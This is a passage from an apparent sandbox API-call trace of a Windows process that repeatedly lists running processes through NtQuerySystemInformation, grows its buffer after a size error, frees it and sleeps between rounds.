SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.120] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.130] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.151] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.162] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.171] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.180] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.190] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.209] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.217] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.226] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.260] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.267] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.274] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.282] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.289] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.296] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.303] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.310] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 